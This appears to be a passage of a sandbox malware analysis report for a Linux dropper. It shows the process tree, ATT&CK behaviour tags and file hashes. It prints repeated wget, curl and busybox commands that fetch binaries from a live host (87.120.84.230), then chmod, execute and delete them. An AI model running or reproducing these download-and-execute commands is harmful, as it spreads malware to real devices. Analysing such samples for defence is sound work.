/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:938
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:944
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:950
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:956
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:962
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:968
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:976
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:980
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97